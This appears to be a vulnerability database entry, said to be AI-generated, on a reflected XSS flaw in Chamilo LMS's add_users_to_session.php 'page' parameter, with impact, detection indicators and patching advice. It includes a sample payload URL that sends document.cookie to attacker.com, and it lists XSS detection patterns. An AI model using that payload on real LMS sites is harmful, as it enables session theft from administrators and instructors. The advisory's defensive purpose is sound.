
Cloud Vulnerability DB
A community-led vulnerabilities database
CVE-2025-52563 is a reflected cross-site scripting (XSS) vulnerability in Chamilo LMS affecting versions up to and including 1.11.28. The flaw stems from insufficient sanitization of the page parameter in the session/add_users_to_session.php endpoint, allowing attackers to inject malicious scripts that execute in a victim's browser. It was published on March 2, 2026, and patched in version 1.11.30. The vulnerability carries a CVSS v3.1 base score of 6.1 (Medium) and a CVSS v4.0 base score of 5.1 (Medium) (GitHub Advisory, Red Hat CVE).
The root cause is improper neutralization of user-supplied input in the page parameter of session/add_users_to_session.php, classified under CWE-79 (Cross-site Scripting), CWE-80 (Improper Neutralization of Script-Related HTML Tags), and CWE-87 (Improper Neutralization of Alternate XSS Syntax). The vulnerability is network-accessible, requires no authentication or elevated privileges, but does require user interaction — specifically, the victim must move their mouse over a crafted element or click a malicious link containing the injected payload. The attack vector is reflected, meaning the malicious script is embedded in a URL and reflected back to the user's browser without being stored server-side (GitHub Advisory).
Successful exploitation allows an attacker to execute arbitrary JavaScript in the context of the victim's browser session, potentially stealing session tokens, credentials, or other sensitive information. Administrators and instructors are the most likely targets, as they have access to the session management endpoint; compromising their accounts could allow unauthorized manipulation of course sessions, user enrollments, or LMS configuration. The vulnerability has limited availability impact but poses confidentiality and integrity risks within the scope of the affected user's browser session (GitHub Advisory, Red Hat CVE).
There is no known public proof-of-concept exploit and no evidence of in-the-wild exploitation at this time. The EPSS score is approximately 0.047%, indicating a low probability of exploitation in the near term. No threat actor attribution has been made, and the vulnerability is not listed in the CISA Known Exploited Vulnerabilities (KEV) catalog. The vulnerability was reported by researcher "4rdr" (GitHub Advisory, Red Hat CVE).
/main/session/add_users_to_session.php endpoint.page parameter, e.g., https://target.example.com/main/session/add_users_to_session.php?page=<script>document.location='https://attacker.com/steal?c='+document.cookie</script>.session/add_users_to_session.php endpoint; unusual GET/POST requests to attacker-controlled URLs containing encoded cookie or session data./main/session/add_users_to_session.php with URL-encoded script tags or JavaScript payloads in the page parameter (e.g., %3Cscript%3E, javascript:, onerror=, onmouseover=).The primary remediation is to upgrade Chamilo LMS to version 1.11.30 or later, which includes the security patch for this vulnerability (GitHub Release). If immediate patching is not feasible, organizations should deploy a Web Application Firewall (WAF) configured to detect and block XSS payloads in the page parameter, and restrict access to the add_users_to_session.php endpoint to trusted IP ranges or authenticated sessions only. Additionally, administrators and instructors should be educated to avoid clicking unsolicited or suspicious links referencing the LMS (GitHub Advisory).
Source: This report was generated using AI
Free Vulnerability Assessment
Evaluate your cloud security practices across 9 security domains to benchmark your risk level and identify gaps in your defenses.
Get a personalized demo
"Best User Experience I have ever seen, provides full visibility to cloud workloads."
"Wiz provides a single pane of glass to see what is going on in our cloud environments."
"We know that if Wiz identifies something as critical, it actually is."